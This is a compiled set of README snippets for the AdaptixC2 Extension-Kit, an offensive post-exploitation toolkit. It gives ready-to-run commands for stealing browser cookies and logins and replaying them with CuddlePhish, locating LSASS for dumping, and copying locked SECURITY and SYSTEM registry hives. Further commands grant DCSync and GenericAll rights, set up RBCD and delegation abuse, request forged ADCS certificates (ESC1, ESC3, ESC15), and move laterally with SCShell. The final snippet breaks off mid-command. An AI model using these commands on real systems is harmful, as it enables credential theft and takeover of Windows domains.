### CuddlePhish Project Setup and Cookie Import Source: https://github.com/adaptix-framework/extension-kit/blob/main/Creds-BOF/cookie-monster/README.md Instructions for setting up the CuddlePhish project, including cloning the repository, installing Node.js dependencies, and importing decrypted cookies. ```bash cd git clone https://github.com/fkasler/cuddlephish cd cuddlephish curl -fsSL https://deb.nodesource.com/setup_23.x -o nodesource_setup.sh sudo -E bash nodesource_setup.sh sudo apt-get install nodejs npm install cp ~/cookie-monster/cuddlephish_YYYY-MM-DD_HH-MM-SS.json . node stealer.js cuddlephish_YYYY-MM-DD_HH-MM-SS.json ``` -------------------------------- ### Install Requirements Source: https://github.com/adaptix-framework/extension-kit/blob/main/Creds-BOF/cookie-monster/README.md Install the necessary Python packages before running the decryption script. ```bash pip3 install -r requirements.txt ``` -------------------------------- ### Install Build Tools for Ubuntu/Kali Source: https://github.com/adaptix-framework/extension-kit/blob/main/README.md Installs necessary MinGW-w64 cross-compilation tools for building modules on Ubuntu or Kali Linux. ```bash apt install g++-mingw-w64-x86-64-posix gcc-mingw-w64-x86-64-posix mingw-w64-tools ``` -------------------------------- ### Install Build Tools for Arch Linux Source: https://github.com/adaptix-framework/extension-kit/blob/main/README.md Installs necessary MinGW-w64 cross-compilation tools for building modules on Arch Linux. ```bash pacman -Syu mingw-w64-x86_64-gcc mingw-w64-x86_64-gcc-libs ``` -------------------------------- ### Install Dependencies and Build Extension-Kit Source: https://context7.com/adaptix-framework/extension-kit/llms.txt Installs necessary MinGW cross-compilers for Ubuntu/Kali and Arch Linux, then clones and builds all BOF modules for the Extension-Kit. Alternatively, a Docker build is available. ```bash # Ubuntu / Kali apt install g++-mingw-w64-x86-64-posix gcc-mingw-w64-x86-64-posix mingw-w64-tools # Arch Linux pacman -Syu mingw-w64-x86_64-gcc mingw-w64-x86_64-gcc-libs # Clone and build every module git clone https://github.com/Adaptix-Framework/Extension-Kit cd Extension-Kit make # Or build inside Docker make docker-build ``` -------------------------------- ### Configure Unconstrained Delegation (Example) Source: https://github.com/adaptix-framework/extension-kit/blob/main/AD-BOF/LDAP-BOF/README.md Configures unconstrained delegation on a specified computer account. This is a direct example of the add-unconstrained macro. ```bash # Configure unconstrained delegation ldap add-unconstrained WS01$ ``` -------------------------------- ### Make User AS-REP Roastable (Example) Source: https://github.com/adaptix-framework/extension-kit/blob/main/AD-BOF/LDAP-BOF/README.md Makes a user AS-REP roastable by setting the DONT_REQ_PREAUTH flag. This is a direct example of the add-asreproastable macro. ```bash # Make user AS-REP roastable ldap add-asreproastable targetuser ``` -------------------------------- ### Download SYSTEM Hive with Custom Filename Source: https://github.com/adaptix-framework/extension-kit/blob/main/Creds-BOF/UnderlayCopy/README.md Example of downloading the SYSTEM registry hive to the server and specifying a custom filename for the downloaded file. ```bash # Download SYSTEM hive with custom filename underlaycopy MFT C:\Windows\System32\config\SYSTEM --download -w SYSTEM_backup ``` -------------------------------- ### Build Extension Kit Modules Source: https://github.com/adaptix-framework/extension-kit/blob/main/README.md Clones the Extension Kit repository and builds all modules using make. Ensure build tools are installed prior to running. ```bash git clone https://github.com/Adaptix-Framework/Extension-Kit cd Extension-Kit make ``` -------------------------------- ### Request Certificate (certi req) Source: https://github.com/adaptix-framework/extension-kit/blob/main/AD-BOF/ADCS-BOF/README.md Requests an enrollment certificate from a specified CA. Options include specifying the template, subject, alternate names (SANs), and installation preferences. Use --pem for PEM output instead of PFX. The --policy flag adds App policy for client auth and acting as a certificate agent. ```bash certi req <--ca CA> [--template Template] [--subject CN] [--altname CN] [--alturl tag:microsoft.com,2022-09-14:sid:] [--install] [--machine] [--policy] [--dns] [--pfx-password password] [--pem] ``` -------------------------------- ### Copy File Using Metadata Mode Source: https://github.com/adaptix-framework/extension-kit/blob/main/Creds-BOF/UnderlayCopy/README.md Example of copying an unlocked file using Metadata mode, which is generally faster. The file is saved to a specified destination with a new name. ```bash # Copy file using Metadata mode (faster for unlocked files) underlaycopy Metadata C:\Windows\System32\notepad.exe -w C:\temp\notepad_copy.exe ``` -------------------------------- ### Cookie-Monster BOF Usage Examples Source: https://github.com/adaptix-framework/extension-kit/blob/main/Creds-BOF/cookie-monster/README.md Demonstrates various ways to invoke the cookie-monster BOF, including targeting specific browsers, decrypting keys, and specifying file operations. ```bash cookie-monster --chrome ``` ```bash cookie-monster --edge ``` ```bash cookie-monster --system "C:\Users\\AppData\Local\\User Data\Local State" ``` ```bash cookie-moster --firefox ``` ```bash cookie-monster --chromeCookiePID ``` ```bash cookie-monster --chromeLoginDataPID ``` ```bash cookie-monster --edgeCookiePID ``` ```bash cookie-monster --edgeLoginDataPID ``` -------------------------------- ### Configure Constrained Delegation Source: https://github.com/adaptix-framework/extension-kit/blob/main/AD-BOF/LDAP-BOF/README.md Configures constrained delegation for a specified computer account and service. This is a direct example of the add-constrained macro. ```bash # Configure constrained delegation ldap add-constrained WS02$ CIFS/DC01.corp.local ``` -------------------------------- ### Grant GenericAll on User Source: https://github.com/adaptix-framework/extension-kit/blob/main/AD-BOF/LDAP-BOF/README.md Grants GenericAll permissions on a target user account to an attacker user. This is a direct example of the add-genericall macro. ```bash # Grant GenericAll on user ldap add-genericall targetuser attackeruser ``` -------------------------------- ### Compile Cookie-Monster BOF Source: https://github.com/adaptix-framework/extension-kit/blob/main/Creds-BOF/cookie-monster/README.md Command to compile the Cookie-Monster BOF using make. Ensure Mingw-w64 and make are installed prior to execution. ```bash make ``` -------------------------------- ### Configure RBCD Source: https://github.com/adaptix-framework/extension-kit/blob/main/AD-BOF/LDAP-BOF/README.md Configures Resource-Based Constrained Delegation (RBCD) between specified accounts. This is a direct example of the add-rbcd macro. ```bash # Configure RBCD ldap add-rbcd DC01$ ATTACKER$ ``` -------------------------------- ### Download Locked SECURITY Hive to Server Source: https://github.com/adaptix-framework/extension-kit/blob/main/Creds-BOF/UnderlayCopy/README.md Example of downloading the SECURITY registry hive to the server using MFT mode. The file is automatically named using the HOSTNAME_FILENAME.hive format. ```bash # Download locked SECURITY hive to server (saved as HOSTNAME_SECURITY.hive) underlaycopy MFT C:\Windows\System32\config\SECURITY --download ``` -------------------------------- ### Get Delegation Configuration Source: https://github.com/adaptix-framework/extension-kit/blob/main/AD-BOF/LDAP-BOF/README.md Retrieves the delegation configuration for a specified target object. Requires the target identifier, and optionally accepts an OU path, domain controller FQDN, and LDAPS flag. ```bash ldap get-delegation [-ou ou_path] [-dc dc_fqdn] [--ldaps] ``` -------------------------------- ### Request Certificate (ESC1 - SAN) Source: https://context7.com/adaptix-framework/extension-kit/llms.txt Requests certificates using ESC1 (Subject Alternative Name) by specifying the CA, template, and alternative name. Supports installing the certificate locally or outputting PEM format. Can also add application policies for ESC15. ```bash certi req --ca "corp-CA" --template User --altname Administrator --install ``` ```bash certi req --ca "corp-CA" --template Machine --machine --pem ``` ```bash certi req --ca "corp-CA" --template ESC15Template \ --altname Administrator --policy # ESC15: add app policy ``` -------------------------------- ### Get LSASS PID Source: https://github.com/adaptix-framework/extension-kit/blob/main/Creds-BOF/nanodump/README.md Retrieves the Process ID (PID) of the LSASS process. ```bash nanodump --getpid ``` -------------------------------- ### Create Computer Account Source: https://github.com/adaptix-framework/extension-kit/blob/main/AD-BOF/LDAP-BOF/README.md Creates a new computer account in Active Directory. Requires the computer name and a password. ```bash # Create computer account ldap add-computer TESTCOMP -p Password123! ``` -------------------------------- ### Grant DCSync Rights Source: https://github.com/adaptix-framework/extension-kit/blob/main/AD-BOF/LDAP-BOF/README.md Grants DCSync permissions to a specified user on the domain object. This is a direct example of the add-dcsync macro. ```bash # Grant DCSync rights ldap add-dcsync "DC=corp,DC=local" eviluser ``` -------------------------------- ### Token Make Command Source: https://github.com/adaptix-framework/extension-kit/blob/main/LateralMovement-BOF/README.md Creates an impersonated token from provided credentials. This token will be available in the 'Access' menu. ```shell token make ``` -------------------------------- ### nbtscan: Custom timeout Source: https://github.com/adaptix-framework/extension-kit/blob/main/SAR-BOF/README.md Sets a custom response timeout in milliseconds for the scan. This example uses 2000ms (2 seconds). ```Shell nbtscan 192.168.1.0/24 -t 2000 ``` -------------------------------- ### UnderlayCopy-BOF Command Line Usage Source: https://github.com/adaptix-framework/extension-kit/blob/main/Creds-BOF/UnderlayCopy/README.md The command-line syntax for using UnderlayCopy-BOF. Specify the copy mode, source file, and either a destination path or the --download flag. ```bash underlaycopy [-w destination] [--download] ``` -------------------------------- ### Authenticate with Certificate (certi auth) Source: https://github.com/adaptix-framework/extension-kit/blob/main/AD-BOF/ADCS-BOF/README.md Authenticates with a certificate using PKINIT and optionally UnPAC-the-hash. Use --cert for base64 encoded certs or --pfx for PFX files. Specify --dc for a domain controller or let it auto-detect. The --no-unpac flag retrieves only the TGT without extracting the NT hash. ```bash certi auth <{--cert base64_cert} || {--pfx file.pfx}> [--password pfx_password] [--dc DC] [--no-unpac] ``` -------------------------------- ### Authenticate via Certificate (PKINIT) Source: https://context7.com/adaptix-framework/extension-kit/llms.txt Authenticates to a domain using a PFX certificate, supporting PKINIT and optionally skipping NT hash extraction. ```bash certi auth --pfx /tmp/admin.pfx --password PfxPass1 --dc 192.168.1.10 ``` ```bash certi auth --cert BASE64ENCODEDPFX --no-unpac # TGT only, skip NT hash ``` -------------------------------- ### Create New User Account Source: https://github.com/adaptix-framework/extension-kit/blob/main/AD-BOF/LDAP-BOF/README.md Creates a new user account in Active Directory with a specified username and password. ```bash # Create new user ldap add-user jane.doe Password123! ``` -------------------------------- ### Get Machine Account Quota Source: https://github.com/adaptix-framework/extension-kit/blob/main/AD-BOF/LDAP-BOF/README.md Retrieves the Machine Account Quota (ms-DS-MachineAccountQuota) value for the domain. Optionally specify the domain controller FQDN and enable LDAPS. ```bash ldap get-maq [-dc dc_fqdn] [--ldaps] ``` -------------------------------- ### List All Computers in Domain Source: https://github.com/adaptix-framework/extension-kit/blob/main/AD-BOF/LDAP-BOF/README.md Lists all computer objects within the domain. Optional parameters include specifying an OU, domain controller FQDN, desired attributes, and enabling LDAPS. ```bash ldap get-computers [-ou ou_path] [-dc dc_fqdn] [-a attributes] [--ldaps] ``` -------------------------------- ### Display IP Configuration Source: https://github.com/adaptix-framework/extension-kit/blob/main/SAL-BOF/README.md Shows the IPv4 address, hostname, and DNS server information for the network interfaces. ```bash ipconfig ``` -------------------------------- ### Runas Session Command Source: https://github.com/adaptix-framework/extension-kit/blob/main/LateralMovement-BOF/README.md Executes a binary in another user's session using the IHxHelpPaneServer COM interface. ```shell runas-session ``` -------------------------------- ### Load Extension-Kit BOFs in AdaptixC2 Source: https://context7.com/adaptix-framework/extension-kit/llms.txt Loads all ten sub-scripts of the Extension-Kit into the AdaptixC2 client via the AxScript engine. Ensure the extension-kit.axs file is placed in the correct directory. ```javascript // extension-kit.axs var path = ax.script_dir(); ax.script_load(path + "AD-BOF/ad.axs"); ax.script_load(path + "AD-BOF/ad-services.axs"); ax.script_load(path + "Creds-BOF/creds.axs"); ax.script_load(path + "Elevation-BOF/elevate.axs"); ax.script_load(path + "Execution-BOF/execution.axs"); ax.script_load(path + "Injection-BOF/inject.axs"); ax.script_load(path + "LateralMovement-BOF/lateral.axs"); ax.script_load(path + "Postex-BOF/postex.axs"); ax.script_load(path + "Process-BOF/process.axs"); ax.script_load(path + "SAL-BOF/sal.axs"); ax.script_load(path + "SAR-BOF/sar.axs"); ``` -------------------------------- ### Jump with SCShell Source: https://github.com/adaptix-framework/extension-kit/blob/main/LateralMovement-BOF/README.md Deploys a service binary to the target system to achieve lateral movement. This method is not fileless. Specify the target, service binary path, and optionally service name, binary name, share, and path. ```shell jump scshell [-n service_name] [-b binary_name] [-s share] [-p path] ``` ```shell jump scshell 10.0.2.10 /tmp/agent_svc.exe -n defragsvc -b update.exe -s C$ -p C:\Windows ``` -------------------------------- ### nbtscan: Hosts file format Source: https://github.com/adaptix-framework/extension-kit/blob/main/SAR-BOF/README.md Outputs scan results in a format compatible with `/etc/hosts` files. ```Shell nbtscan 192.168.1.0/24 -e ``` -------------------------------- ### Get Object Attributes Source: https://github.com/adaptix-framework/extension-kit/blob/main/AD-BOF/LDAP-BOF/README.md Retrieves all attributes for a specified LDAP object. Requires the target object's identifier, and optionally accepts an OU path, domain controller FQDN, and LDAPS flag. ```bash ldap get-object [-ou ou_path] [-dc dc_fqdn] [--ldaps] ``` -------------------------------- ### Request Certificate on Behalf (certi request_on_behalf) Source: https://github.com/adaptix-framework/extension-kit/blob/main/AD-BOF/ADCS-BOF/README.md Requests a certificate on behalf of another user, commonly used for ESC3 scenarios. Requires the CA, template, target user, and an Enrollment Agent (EA) certificate. Use --pem for PEM output. The --ea-password and --pfx-password flags are for the EA PFX and the output PFX respectively. ```bash certi request_on_behalf --ca --template